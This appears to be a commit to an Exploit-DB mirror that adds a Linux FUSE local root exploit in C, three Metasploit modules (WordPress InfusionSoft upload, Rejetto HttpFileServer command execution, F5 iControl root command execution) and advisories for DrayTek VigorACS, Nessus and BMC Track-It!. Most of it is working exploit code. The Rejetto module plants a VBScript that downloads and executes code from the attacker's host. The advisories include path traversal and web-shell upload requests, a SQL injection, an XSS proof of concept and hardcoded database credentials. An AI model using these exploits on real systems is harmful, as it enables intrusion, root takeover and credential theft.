bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_11_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-11 04:45:11 +00:00
parent b8f45520a1
commit 5d692d183c
9 changed files with 777 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
files.csv
View file

@ -31444,3 +31444,10 @@ id,file,description,date,author,platform,type,port
34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0
34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
34923,platforms/linux/local/34923.c,"Linux Kernel remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0
34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0
34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80
34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80
34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443
34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0
34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0

Can't render this file because it is too large.

82
platforms/jsp/webapps/34928.txt Executable file
View file

@ -0,0 +1,82 @@
DrayTek VigorACS SI ( <= 1.3.0)
Vigor ACS-SI Edition is a Central Management System for DrayTek
routers and firewalls,
providing System Integrators or system administration personnel a
real-time integrated
monitoring, configuration and management platform.
-----------------------------------------------------------------------
2.1. Default http-auth username/password used for <ip>/ACSServer/*
We found that most of the VigorACS SI deployments are using the
default http authentication settings (acs/password). This is not so much
a software vulnerability but more a configuration issue.
2.2 Unauthenticated arbitrary file read/write functionality via
UploadDownloadServlet
The UploadDownloadServlet can be used to (read and) write files to the
server directly. In addition, this functionality is accessible without
having to provide the
http authentication details (2.1).
2.3. Path traversal and Local File Inclusion in the FileServlet
The regular expression that is used to prevent this is not sufficient:
it removes occurences of '../' (without the quotes). By providing input
like '....//', the middle '../' will be removed, while the remainder
equals to '../'. We could now use the FileServlet to access any file on
the server:
<ip>/ACSServer/FileServlet?f=....//....//....//....//....//....//....//etc/passwd
2.4. Arbitrary file upload in <ip>/ACSServer/UploadFileServlet
This servlet suffers from the same path traversal vulnerability as
described in 2.2. You can POST data to this servlet to upload files
into arbitrary
locations:
http://<ip>//ACSServer/UploadFileServlet?prefix=<URLENCODED('a&....//....//....//....//....//server/default/deploy/web.war/shell.jsp&a&a&a&a')>
The UploadFileServlet will append '.cfg' to the given filename, this means files
uploaded via this mechanism aren't directly of use by an attacker. However, when
the payload is a ZIP archive, the vuln. in 2.5 (Local unzip functionality)
can be used to unpack an otherwise benign file into an full-blown
remote web-shell.
2.5. Local unzip functionality
The RPC server provides an unzip functionality (rpcmanager.UnZip) that can be
invoked by using the AMF message broker (accessible via
http://<ip>/ACSServer/messagebroker/amf). This functionality can be used
to unzip any file on the file system like one that has been previously uploaded
using the UploadFileServlet vuln.
2.6. ACS runs as root
The webservice is running as the root user.
-----------------------------------------------------------------------
Timetable:
2014-09-26 : Vender released patches (private and unverified) to their customers
2014-07-22 : Vendor states that most of the vulns. are patched
2014-07-08 : Vendor notified customers with large deployments
2014-06-30 : Response of Vendor
2014-06-24 : Notified Vendor
Researchers:
Victor van der Veen (vvdveen@cs.vu.nl)
Erik-Paul Dittmer (epdittmer@digitalmisfits.com)
- - - - - - - - - - - - - - - - - - - - - - - - - -
Digital Misfits does not accept any liability for any errors,
omissions, delays of receipt or viruses in the contents of this
message which arise as a result of e-mail transmission.

194
platforms/linux/local/34923.c Executable file
View file

@ -0,0 +1,194 @@
/*
FUSE-based exploit for CVE-2014-5207
Copyright (c) 2014 Andy Lutomirski
Based on code that is:
Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>
This program can be distributed under the terms of the GNU GPL.
See the file COPYING.
gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid
mkdir test
./fuse_suid test
This isn't a work of art: it doesn't clean up after itself very well.
*/
#define _GNU_SOURCE
#define FUSE_USE_VERSION 26
#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <err.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <unistd.h>
static const char *sh_path = "/sh";
static int sh_fd;
static loff_t sh_size;
static int hello_getattr(const char *path, struct stat *stbuf)
{
int res = 0;
memset(stbuf, 0, sizeof(struct stat));
if (strcmp(path, "/") == 0) {
stbuf->st_mode = S_IFDIR | 0755;
stbuf->st_nlink = 2;
} else if (strcmp(path, sh_path) == 0) {
stbuf->st_mode = S_IFREG | 04755;
stbuf->st_nlink = 1;
stbuf->st_size = sh_size;
} else
res = -ENOENT;
return res;
}
static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi)
{
(void) offset;
(void) fi;
if (strcmp(path, "/") != 0)
return -ENOENT;
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, sh_path + 1, NULL, 0);
return 0;
}
static int hello_open(const char *path, struct fuse_file_info *fi)
{
if (strcmp(path, sh_path) != 0)
return -ENOENT;
if ((fi->flags & 3) != O_RDONLY)
return -EACCES;
return 0;
}
static int hello_read(const char *path, char *buf, size_t size, off_t offset,
struct fuse_file_info *fi)
{
(void) fi;
if (strcmp(path, sh_path) != 0)
return -ENOENT;
return pread(sh_fd, buf, size, offset);
}
static struct fuse_operations hello_oper = {
.getattr = hello_getattr,
.readdir = hello_readdir,
.open = hello_open,
.read = hello_read,
};
static int evilfd = -1;
static int child2(void *mnt_void)
{
const char *mountpoint = mnt_void;
int fd2;
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
err(1, "unshare");
if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)
err(1, "mount");
fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);
if (fd2 == -1)
err(1, "open");
if (dup3(fd2, evilfd, O_CLOEXEC) == -1)
err(1, "dup3");
close(fd2);
printf("Mount hackery seems to have worked.\n");
exit(0);
}
static int child1(const char *mountpoint)
{
char child2stack[2048];
char evil_path[1024];
evilfd = dup(0);
if (evilfd == -1)
err(1, "dup");
if (clone(child2, child2stack,
CLONE_FILES | CLONE_VFORK,
(void *)mountpoint) == -1)
err(1, "clone");
printf("Here goes...\n");
sprintf(evil_path, "/proc/self/fd/%d/sh", evilfd);
execl(evil_path, "sh", "-p", NULL);
perror(evil_path);
return 1;
}
static int fuse_main_suid(int argc, char *argv[],
const struct fuse_operations *op,
void *user_data)
{
struct fuse *fuse;
char *mountpoint;
int multithreaded;
int res;
if (argc != 2) {
printf("Usage: fuse_suid <mountpoint>\n");
return -EINVAL;
}
char *args[] = {"fuse_suid", "-f", "--", argv[1], NULL};
fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,
op, sizeof(*op), &mountpoint,
&multithreaded, user_data);
if (fuse == NULL)
return 1;
printf("FUSE initialized. Time to have some fun...\n");
printf("Warning: this exploit hangs on exit. Hit Ctrl-C when done.\n");
if (fork() == 0)
_exit(child1(mountpoint));
if (multithreaded)
res = fuse_loop_mt(fuse);
else
res = fuse_loop(fuse);
fuse_teardown(fuse, mountpoint);
if (res == -1)
return 1;
return 0;
}
int main(int argc, char *argv[])
{
sh_fd = open("/bin/bash", O_RDONLY);
if (sh_fd == -1)
err(1, "sh");
sh_size = lseek(sh_fd, 0, SEEK_END);
return fuse_main_suid(argc, argv, &hello_oper, NULL);
}

69
platforms/multiple/webapps/34929.txt Executable file
View file

@ -0,0 +1,69 @@
Nessus Web UI 2.3.3: Stored XSS
=========================================================
CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08
-- Info --
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.
-- Affected version -
Web UI version 2.3.3, Build #83
-- Vulnerability details --
By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.
-- POC --
#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log
class Site(server.Site):
def getResourceFor(self, request):
request.setHeader('server', '<script>alert(1)</script>SomeServer')
return server.Site.getResourceFor(self, request)
class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0
def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"
log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()
-- Solution --
This issue has been fixed as of version 2.3.4 of the WEB UI.
-- Timeline --
2014-06-12 Release of Web UI version 2.3.3, build#83
2014-06-13 Vulnerability discovered and creation of POC
2014-06-13 Vulnerability responsibly reported to vendor
2014-06-13 Vulnerability acknowledged by vendor
2014-06-13 Release of Web UI version 2.3.4, build#85
2014-XX-XX Advisory published in coordination with vendor
-- Credit --
Frank Lycops
Frank.lycops [at] thesecurityfactory.be

82
platforms/php/remote/34925.rb Executable file
View file

@ -0,0 +1,82 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress InfusionSoft Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
upload and remote code execution.
},
'Author' =>
[
'g0blin', # Vulnerability Discovery
'us3r777 <us3r777@n0b0.so>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-6446'],
['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
['WPVDB', '7634']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
'DisclosureDate' => 'Sep 25 2014',
'DefaultTarget' => 0)
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
)
if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', 'code_generator.php'),
'method' => 'POST',
'vars_post' =>
{
'fileNamePattern' => php_pagename,
'fileTemplate' => payload.encoded
}
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
else
fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
end
print_status("#{peer} - Calling payload ...")
send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', php_pagename)
}, 2)
end
end

11
platforms/php/webapps/34858.txt
View file

@ -41,3 +41,14 @@ file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip
?> ?>
To get users ip, user agent, ... To get users ip, user agent, ...
DESCRIPTION
===========
Add a product to a customer basket with an image tag and without any verification.
HOW TO
======
Just add [img="/action/order/AddToCart?shopId=13159&productId=13312"][/img] on forum signature or forum posts.

143
platforms/unix/remote/34927.rb Executable file
View file

@ -0,0 +1,143 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "F5 iControl Remote Root Command Execution",
'Description' => %q{
This module exploits an authenticated remote command execution
vulnerability in the F5 BIGIP iControl API (and likely other
F5 devices).
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' # Discovery, Metasploit module
],
'References' =>
[
['CVE', '2014-2928'],
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 iControl', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 17 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
], self.class)
end
def check
get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
hostname = $1
send_cmd("whoami")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
new_hostname = $1
if new_hostname == "root.a.b"
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>#{hostname}</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def send_cmd(cmd)
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>`#{cmd}`.a.b</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
end
def exploit
filename = Rex::Text.rand_text_alpha_lower(5)
print_status('Sending payload in chunks, might take a small bit...')
i = 0
while i < payload.encoded.length
cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
send_cmd(cmd)
i = i + 5
end
print_status('Triggering payload...')
send_cmd("sh /tmp/#{filename}")
end
end

121
platforms/windows/remote/34926.rb Executable file
View file

@ -0,0 +1,121 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Rejetto HttpFileServer Remote Command Execution",
'Description' => %q{
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a
poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by
using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
],
'References' =>
[
['CVE', '2014-6287'],
['OSVDB', '111386'],
['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']
],
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => "Sep 11 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),
], self.class)
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => '/'
})
if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/
version = $1
if Gem::Version.new(version) <= Gem::Version.new("2.3")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end
def on_request_uri(cli, req)
print_status("#{peer} - Payload request received: #{req.uri}")
exe = generate_payload_exe
vbs = Msf::Util::EXE.to_exe_vbs(exe)
send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
# remove resource after serving 1st request as 'exec' execute 4x
# during exploitation
remove_resource(get_resource)
end
def primer
file_name = rand_text_alpha(rand(10)+5)
file_ext = '.vbs'
file_full_name = file_name + file_ext
vbs_path = "%TEMP%\\#{file_full_name}"
vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
vbs_code << "On Error Resume Next\x0d\x0a"
vbs_code << "x.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0a"
vbs_code << "If Err.Number <> 0 Then\x0d\x0a"
vbs_code << "wsh.exit\x0d\x0a"
vbs_code << "End If\x0d\x0a"
vbs_code << "x.Send\x0d\x0a"
vbs_code << "Execute x.responseText"
payloads = [
"save|#{vbs_path}|#{vbs_code}",
"exec|wscript.exe //B //NOLOGO #{vbs_path}"
]
print_status("Sending a malicious request to #{target_uri.path}")
payloads.each do |payload|
send_request_raw({
'method' => 'GET',
'uri' => "/?search=%00{.#{URI::encode(payload)}.}"
})
end
register_file_for_cleanup(vbs_path)
end
def exploit
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
# When the server stops due to our timeout, this is raised
end
end
end

67
platforms/windows/webapps/34924.txt Executable file
View file

@ -0,0 +1,67 @@
>> Multiple critical vulnerabilities in BMC Track-It!
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
The application exposes several .NET remoting services on port 9010.
.NET remoting is a RMI technology similar to Java RMI or CORBA which allows you to invoke methods remotely and retrieve their result. In BMC Track-It!, the .NET remoting services are unauthenticated and unencrypted, meaning that anyone can invoke all the exposed methods remotely.
It is possible to capture traffic and decode the packet format by looking at the (incomplete) Microsoft .NET remoting specifications. Using these techniques, two Metasploit modules were produced: one is an exploit module that can upload arbitrary files to the web root and achieve remote code execution, and the other is an auxiliary module that allows retrieval of the SQL and domain administrator credentials.
Three other vulnerabilities (SQL injection, arbitrary file download and hardcoded database credentials) were also discovered.
A special thanks to CERT for handling the communication to BMC and the disclosure of these vulnerabilities. These issues are tracked by CERT as VU#121036 (http://www.kb.cert.org/vuls/id/121036).
>> Background on the affected product:
"Track-It! IT Help Desk Software includes everything you need for IT Help Desk management. Full featured, easy to deploy, easy to use and cost-effective, Track-It! Help Desk is designed specifically with the needs of small to mid-sized organizations in mind.
Over 55,000 organizations worldwide have trusted Track-It! for their IT help desk ticketing and asset management needs. Track-It! IT Help Desk Software includes, helpdesk, work order ticket tracking, incident and problem management, knowledge management, service level management, asset management, change management, software license management, mobile device access, end-user self-service and more. Track-It! Help Desk delivers the strength of ITSM best practices with the simplicity of smooth installation and quick configuration to provide instant return on your investment."
>> Technical details:
#1 Domain administrator and SQL server user credentials disclosure (unauthenticated)
Versions affected: 9 to 11.3+ (version 8 might be affected, but could not be confirmed)
CVE-2014-4872
The application exposes an unauthenticated .NET remoting configuration service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a configuration file that contains the application database name, username and password as well as the domain administrator username and password. These are encrypted with a fixed key and IV ("NumaraIT") using the DES algorithm. The domain administrator username and password can only be obtained if the Self-Service component is enabled, which is the most common scenario in enterprise deployments.
A Metasploit module that exploits this vulnerability has been released.
#2 Remote code execution via file upload (unauthenticated)
Versions affected: 8 to 11.3+
CVE-2014-4872 (same as #1)
The application exposes an unauthenticated .NET remoting file storage service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an arbitrary path on the machine that is running Track-It!. This can be used to upload a file to the web root and achieve code execution as NETWORK SERVICE or SYSTEM.
A Metasploit module that exploits this vulnerability has been released.
#3 Blind SQL injection (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4873
POST /TrackItWeb/Grid/GetData
pagingMode=0&id=WebGrid.21&appFilters=[{"type":"numeric","field":"userid = 51)) blag; $CREATE TABLE lol(lulz text);$ select woid from (select woid, row_number() over (ORDER BY woid) RowNumber from z$vTASKS_BROWSE -- ","comparison":"=","value":51}]
Accepts injection between the two $.
#4 Arbitrary file download (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4874
GET /TrackItWeb/Attachment/Open?attachmentType=1&entityId=1337&entityGuid=aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa&fileName=C:\boot.ini
#5 Hardcoded database credentials
Versions affected: Unknown, at least from 8 to 11.3+
When installed with the built-in SQL Express, Track-It! uses the following hardcoded database credentials:
Username: TrackIt80_1
Password: TI_DB_P@ssw0rd
>> Fix:
UNFIXED - the vendor refused to acknowledge the vulnerabilities and did not respond to CERT.
Block all communications from untrusted networks (e.g. the Internet) to ports 9010 to 9020; also block the SQL Express database port (default is 49159) if you are using the built-in database.
Ensure you do not have any untrusted users with access to Track-It!.